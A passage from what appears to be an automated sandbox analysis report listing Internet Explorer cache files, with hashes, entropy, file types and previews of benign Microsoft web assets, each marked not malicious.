Preview: body .grid,.body-open .grid,.grid h3,.grid .h3,.grid .header-small,.grid strong,.grid .body-tight-2,.grid h1,.grid .h1,.grid .header-large,.grid .caption{font-family:"Segoe UI"}.grid{max-width:1600px !important}.js-global-head .c-uhfh-gcontainer button.glyph-global-nav-button{display:none}.shell-header-wrapper,.shell-footer-wrapper,.shell-category-nav,.shell-notification .shell-notification-grid-row{max-width:1180px !important}.PsTitle{font-family:Segoe UI,sans-serif;margin-right:.3em !important;font-size:2em;display:inline-block;vertical-align:top;margin-left:-.02em}.childModule{margin-left:8% !important}.CollectingYourInfoRightNav{display:none}html[dir=rtl] .m-r-md{margin-right:0;margin-left:10px}html[dir=rtl] .m-l-md{margin-left:0;margin-right:10px}html[dir=rtl] .m-r-bl{margin-right:0;margin-left:40px}
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\ux.converged.error.core.min_2y6puv-fhesw6oymb-3hdq2[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with CRLF, LF line terminators
Size (bytes): 306089
Entropy (8bit): 5.466321305176346
Encrypted: false
MD5: 1AF095F9F7CAE6E78993BFBCCEC6667C
SHA1: CE3DE4032609A71B606AF35117D869C8DE0B80D8
SHA-256: E187E07E550C6C4204CFD912A23199C55BCF30FA76D20AB58ECDF2CD75CA5BCD
SHA-512: 11EB56F41CD094A7FFE5CCE756741148914C11E5C1EEDDF9CAE4DE960C8830D621AF201187F5BD8056152766B76EA30A298C0467F135205968A93934BFBAC6AD
Malicious: false
Preview: /*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------.. * .. * This file is based on or incorporates material from the projectslisted below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise... * .. * json2.js (2016-05-01).. * https://github.com/douglascrockford/JSON-js.. * License: Public Domain.. * .. * Provided for Informational Purposes Only.. * .. * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.!function(e){function t(n){if(i[n])return i[n].exports;var a=i[n]=
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0-small_138bcee624fa04ef9b75e86211a9fe0d[1].jpg
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 50x28, frames 3
Size (bytes): 101292
Entropy (8bit): 7.8172319338881335
Encrypted: false
MD5: D365F16C9A53DD752036CD8FB2591EEB
SHA1: 02C216E6A002834ADA9FBEEEE1401E7844587A03
SHA-256: 0DB3C3AD031F72C1404D7B7613971547299E27AD1B70FAABBB972E799EF01206
SHA-512: 1E6145EF39C72830CE7D483B88F6B5A183994044E2901729263614913A618D9396A3C6F893413D911B3FFA8AA565DEED3FBD297E7FF43F9561D94F673FC72015
Malicious: false
Preview: ......JFIF.....H.H.....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0[1].jpg
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: data
Size (bytes): 267298
Entropy (8bit): 7.984423733048217
Encrypted: false
MD5: 03A70BDE53DD775BF2798438F52E430A
SHA1: 37942898606FC0B94BF810181C03A11FC4483250
SHA-256: D6CF9E1F9EE42A9E3F00C701EBC4B39458402376E5D0EFE616F3E8C0E55A6FD4
SHA-512: 7E2247A421B8A7F2E2463D9627881DCAC95F95C32180041BF85E63F4A13807FBCF8897FCFCAFD1C7270D90BD56FFCA4635380E42E4A8BC642DA9F9755EB79A8A
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\0_a5dbd4393ff6a725c7e62b61df7e72f0[1].jpg
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: data
Size (bytes): 185065
Entropy (8bit): 7.980943347042259
Encrypted: false
MD5: 46FEA73CD8377663DF7A840E9DEBF599
SHA1: 1FC10AD6A21A92C95C19A96878BD7BACC89EACFE
SHA-256: F38E56F2352DE13B5DFEBD579BD2DE87B81B61CB5DE6CB717DF65169D828D065
SHA-512: 82C92CE9F1ADAF7C0F06B06810BEF828600ECD392E25C1743A564545A91BBFD443512B89DE26966C0F31A331B4C865D778CA702AA8A897246C134E57EC01E902
Malicious: false
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\NewErrorPageTemplate[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 1612
Entropy (8bit): 4.869554560514657
Encrypted: false
MD5: DFEABDE84792228093A5A270352395B6
SHA1: E41258C9576721025926326F76063C2305586F76
SHA-256: 77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512: E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious: false
Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\RE1Mu3b[1].png
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
Size (bytes): 4054
Entropy (8bit): 7.797012573497454
Encrypted: false
MD5: 9F14C20150A003D7CE4DE57C298F0FBA
SHA1: DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
SHA-256: 112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
SHA-512: D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
Malicious: false
Preview: .PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\converged_ux_v2_pfEhDrELLHNcznXIOy__sQ2[1].css
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines
Size (bytes): 96088
Entropy (8bit): 5.290692297364742
Encrypted: false
MD5: 7B634B9A5338663077D64B7E15859ADD
SHA1: 971C4049EA8572EF67426E929676B6C6402782DD
SHA-256: 0581D38458F25293B820B01FE058C1DAF8B2365CE6198BB43EC95385B4ECDD79
SHA-512: FF5D0696D2523D61915CFDFAB0F7DCF8562FA42E2731E1D79E62F32D82760D48A0CC466A5742795ED8F8A53C6A2AF140CE734A16929A176B4562C5FB97F1C8A7
Malicious: false
Preview: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file isbased on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. ..//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 Twitter, Inc..Permission is hereby granted, free of charge, to any perso
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\errorPageStrings[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 4720
Entropy (8bit): 5.164796203267696
Encrypted: false
MD5: D65EC06F21C379C87040B83CC1ABAC6B
SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious: false
Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\favicon[1].ico
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
Size (bytes): 17174
Entropy (8bit): 2.9129715116732746
Encrypted: false
MD5: 12E3DAC858061D088023B2BD48E2FA96
SHA1: E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
SHA-256: 90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
SHA-512: C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
Malicious: false
Preview: ..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\httpErrorPagesScripts[1]
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Size (bytes): 12105
Entropy (8bit): 5.451485481468043
Encrypted: false
MD5: 9234071287E637F85D721463C488704C
SHA1: CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256: 65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512: 87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious: false
Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\icons[1].eot
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: Embedded OpenType (EOT), icons family
Size (bytes): 18519
Entropy (8bit): 7.668180326917825
Encrypted: false
MD5: C443B409CE8632A587760F940862748F
SHA1: B1A8B7B8B6B1D4A436B36598D4BD73936BABD639
SHA-256: 39C39A6744CF958E497D3D0A2120F4A7BC0124359231C39E4EDF2387146B0F05
SHA-512: F1593347AC31D6D3B4F904341090B50FE6783F95A4FF2BFED5A96660F4DEF2BBE30DBE3D5EB9EE1DD0D603CFF73E219698B49F1FF35F8228F5B6F34F3C8259BF
Malicious: false
Preview: $.................................LP...........................G....................i.c.o.n.s.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...0.....i.c.o.n.s................ OS/[email protected]...(...Vcmap.1.........Jglyf..........dhead.9.........6hhea.$.........$hmtx@...........loca". h...L...Bmaxp.3.`....... name............post{NK............................................ ........G..._.<............|.......|......................... .T...................................D.l...H.D.l....................................PfEd.@...........................................................................................................................................................................D...........(............................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\latest[1].eot
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: data
Size (bytes): 20916
Entropy (8bit): 7.972782105593206
Encrypted: false
MD5: 1BB0A7EC21A09DA6473E9423345D6FEB
SHA1: 71FF957FBB5A00BF417573C1EC51CB20E89DBF4B
SHA-256: 095C35B21BB3328173E2E6BFF0772CD25488820C7FD3505915D19858E31D60F7
SHA-512: 4E436297FFF3E18E0190DD8457418999327D94CC50328EE9889460FC2F58DEA7E34A89FD796F84A6604066EB8BC14437DDF5689D6947651889CB2A472ABEE01A
Malicious: false
Preview: R...F...._..".)..2..#.\IDj*..z"..*%..#.M........<!....w.$.?.<3'...\.......5$6)O.2.r.K7............s..p...c@.)8.B.9i..<.].....v....:}.....ej.N..c..G.2.4W..0Z..!../[email protected]?.....B8-..&..t%....<TB..N.........IQ...R.....L....>.y..{E:0lB+NA.3aF.......#|..!..9..\;....M....[0XI...2.Y.8.K.E...K.-.....?.t>...!%$.Q.......b<...\K#.......DK.....mS...[...<.....".I....W..$."...)..wh..Cr.ch...+.....Cc.n..6....-T.r.{[email protected] .g..q.P.pW..'.9.*..|!.A.n...D<.....h9p......*..l..I....o<.6....x.1....6..F..ce.*a]..B.5..d0..fP..6"..|v.ff^.=.,./..@..=...D.. .././v....$f[..?....p .G.S.......d.n.%.[...-&.*.E..j.-..G....f.....Y.Q.n...`.;..U.L......{\5@\.I..F....".Bv.m......H.X.......~. ...Y.....[.r.$L...7.B6...+-.3!..aZkh...}.n.9...e.7..F..F"....~.......QH}..)E../d.Z..X...%....Y.I5l8_..."b....,q.pd.........].#?.qmy...........*..v64...)j..6.\..%.$....E]..`.....z..J....F.m$Y.....6.....p.,,....|....R&L]..WB.q..<.|>.uN..MR.87
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\lwsignupheaderjs_4NYTMbxtFAmu44aIr74B-Q2[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines
Size (bytes): 5842
Entropy (8bit): 5.270910508242207
Encrypted: false
MD5: F63DE116518C387CE1B74E2AFEDF1D39
SHA1: E62100D00AC32F5C078E49CB1E3E744310FBEE9C
SHA-256: 2D61BD15CBF2528D2CECB823946C092DDA370E2D41EE68A888E0323E1DAFDF7A
SHA-512: 40FBF92B222C41ABC52D58DA755E2C43673DA501228FD61E1EB0267FFB8930BDBD1355E7527D6FBCEA8971CED999A04BF89727AB1758961B7FFD06490CE8B759
Malicious: false
Preview: function registerNamespace(){for(var e=arguments.length,t=0;e>t;t++){for(var r=this,o=arguments[t].split("."),n=o.length,a=0;n>a;a++){var i=o[a];r[i]||(r[i]=function(){}),r=r[i]}}}!function(){function e(e,o,n,a,i){var s=this,f=null,l=null,c=!1;try{f=t.external}catch(u){}try{l=t.webkit&&t.webkit.messageHandlers||null,c=null!==l}catch(u){}s.getPropertyBag=function(){if(a){if(i&&"undefined"!=typeof Storage&&"undefined"!=typeof JSON&&sessionStorage.property){return JSON.parse(sessionStorage.property)}var e=s.getCookieValue("Property");.if(e&&"undefined"!=typeof JSON){return JSON.parse(e)}}return null},s.getProperty=function(e){var t=null;try{t=f.Property(e)}catch(r){if(a){var o=s.getPropertyBag();o&&(t=o[e],t="string"==typeof t?decodeURIComponent(t):t)}}return t},s.setWizardButtons=function(t,r,o){try{if(!e){if(c){var n={"IsBackEnabled":t,"IsNextEnabled":r,"IsLastPage":o};l.SetWizardButtons.postMessage(JSON.stringify(n))}else{f.SetWizardButtons(t,r,o)}}}catch(i){a&&(s.setCookieValue("Page"
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2[1].svg
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 3651
Entropy (8bit): 4.094801914706141
Encrypted: false
MD5: EE5C8D9FB6248C938FD0DC19370E90BD
SHA1: D01A22720918B781338B5BBF9202B241A5F99EE4
SHA-256: 04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
SHA-512: C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
Malicious: false
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\print-icon[1].png
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: PNG image data, 16 x 16, 8-bit/color RGB, non-interlaced
Size (bytes): 173
Entropy (8bit): 5.970149697517944
Encrypted: false
MD5: 023F5AC6E0114AF1F781BE5D3C956385
SHA1: C166284B8541F1DE32DC5C4DEC635C296BF85C98
SHA-256: 75D637BF6B6DFF2525095D0BE7E0C90F012BB118C2EF19099AFDCBC630ADFC79
SHA-512: DAFA49056E3D3014DB392410685CC05773C09938E2E700657727928EDCFF8EA2D7C769D377539C52DA70321B94F4E8F045F565EC51BC2B701D95BB3213CC2203
Malicious: false
Preview: .PNG........IHDR...............h6....tEXtSoftware.Adobe ImageReadyq.e<...OIDATx.b...?..0222`..jX..a5...D0.50.......k......:...X=....'..(..I.....K........ .........IEND.B`.
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VINVDFP6\script[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: ASCII text, with very long lines, with no line terminators
Size (bytes): 28228
Entropy (8bit): 5.328001992404352
Encrypted: false
MD5: 62CAEEAADDE772430F6D4C6BFB57D631
SHA1: 4F599DC9B764720A6E85E06BA228595DB0959AC4
SHA-256: E2AFDBAAE33821CC0792E905C5F3BDB1EB49789C66803C39B1028FF566C765E9
SHA-512: DF5E00BE2C96EA361336C4BA529A7C288FBA65FD6ED0832DEF15CBB3989307AF7C24ED6FD4EA591E885932A7A7F947056E7116D942A3D15B6ABA8F346E534B8F
Malicious: false
Preview: function ShowSelectedComponentKeyPress(n,t){if(window.event.keyCode==13)return ShowSelectedComponent(n,t),!1}function SetRightSideNavigationMenuHeight(){$("[id^=dvModuleGroup_]").hide();window.location.search.toLowerCase().indexOf("bookmarkid")!=-1&&SelectBookMark();window.location.search.toLowerCase().indexOf("componentid")!=-1&&LoadSelectedInternalLink();$(".div_side_comp").length>0&&$(".div_content").css("min-height",$(".div_side_comp").height()-27)}function ShowSelectedComponent(n,t){var i=$("#"+t).attr("data-parentModule");return i!=undefined&&i!=null&&($("[data-parentmodule="+i+"]").show(),$("#"+i+" [id$=_LongDescription]").length>0?(document.getElementById(i+"_LongDescription").style.display="block",document.getElementById(i+"_ShortDescription").style.display="none",ShowText($("#"+i+".learnMoreLabel"),"long")):ShowText($("#"+i+".learnMoreLabel"),"long"),DisplayTopNavigation(i)),$("html, body").animate({scrollTop:$("#"+t).offset().top-1},800),!1}function ShowToolTip(){var n,i,t;w
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\18-d72213[1].js
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines
Size (bytes): 128007
Entropy (8bit): 5.225176216325186
Encrypted: false
MD5: 59AD05CBCCE6803FB00314310F20FC45
SHA1: F7A094F6E0E60CD5C5B20D10788AF8A8F71CFEFF
SHA-256: 55AFD02F9CA1FE1B8D3705EF8EBA7C9A8E2F0BA4B8D1AB8853A2A10FAE9E4AC8
SHA-512: 7EDCE6C4078519C8E623B5CC32F47E8033E400673F17BEDBF59A8C6DAB551705E2C33000D158CAB2C7EB164281D6C5980B81FE0F297B38AF05061F086C121D09
Malicious: false
Preview: (function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\51-6d3a1e[1].css
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: UTF-8 Unicode text, with very long lines
Size (bytes): 163522
Entropy (8bit): 5.050717299586406
Encrypted: false
MD5: 6178D19989D7964964A1CC7BED82F341
SHA1: 8B0DBA5CCCCFAC4ED390F900F85B275A5507215A
SHA-256: 3ABC05CF7FCD206115A9F2871547BE6A8649C34B2EFC0D1F77441147A5A78BC8
SHA-512: 120F92E7C4F785EADC0B000F0035E475977ECAAA4131500E3D2EE3C4CE9D1A368DB3C07D16BEB58DE46AD2F6857503A3445DFE06BEA23F59646424FFA1946F81
Malicious: false
Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c[1].svg
Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type: SVG Scalable Vector Graphics image
Size (bytes): 2100
Entropy (8bit): 4.112944982261013
Encrypted: false
MD5: 747A513A54BAA645775E49D4C52696D4
SHA1: D24769327CA348064544DDC259726EFBEC3DAE36
SHA-256: DFCBA2DC365A99E7DEDAEFAEE7171282F9F6AC2B928B4E99060925EE6E129BA4
SHA-512: C17A9065E6F307E4E45D5C422FE42E75F12DDA916715E7A927FF2DB9F6677249DA4B2545772594051AE2B93A47D61BC6356DE5412C9213C33C04BF018CA88509
Malicious: false
Preview: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#777777" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><t
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VTIIBVU5\favicon[1].ico
